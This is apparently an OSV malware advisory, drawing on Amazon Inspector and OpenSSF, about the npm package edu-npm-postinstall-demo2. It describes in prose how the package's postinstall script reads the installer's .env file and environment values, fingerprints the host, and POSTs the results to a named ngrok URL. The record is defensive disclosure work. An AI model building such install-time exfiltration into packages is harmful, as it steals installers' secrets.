OSV-MAL-2026-5624

Malicious code in edu-npm-postinstall-demo2 (npm)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (ce30f195fb63661526196defd7d613a58ded58acd1208989400bf6267de6bfb1) On `npm install`, postinstall.js reads the installer's `.env` file from INIT_CWD, harvests environment variable values (DEMO_-prefixed), collects host identifiers via os.hostname() and os.platform(), and POSTs the combined payload to a hardcoded ngrok tunnel at https://scary-blooper-brewery.ngrok-free.dev/collect. The package describes itself as an educational demo, but the destination is an anonymous, author-mutable tunneling host with no publisher relationship — the canonical install-time exfiltration shape. Additionally, package.json declares a `build` script pointing at scripts/mine_cyrpto.js (misspelled 'crypto'); the file is currently empty and not auto-invoked, but its presence in the tarball is a quality/intent signal alongside the exfil. Installer harm is concrete and automatic on default install: filesystem read of installer secrets + host fingerprinting + outbound transmission to an attacker-style endpoint. ## Source: ossf-package-analysis (fb14831b7d92cfc67e25e029a80fd7a2fb855e68863a0f08f71e8d5fe41fe7ea) The OpenSSF Package Analysis project identified 'edu-npm-postinstall-demo2' @ 1.0.3 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.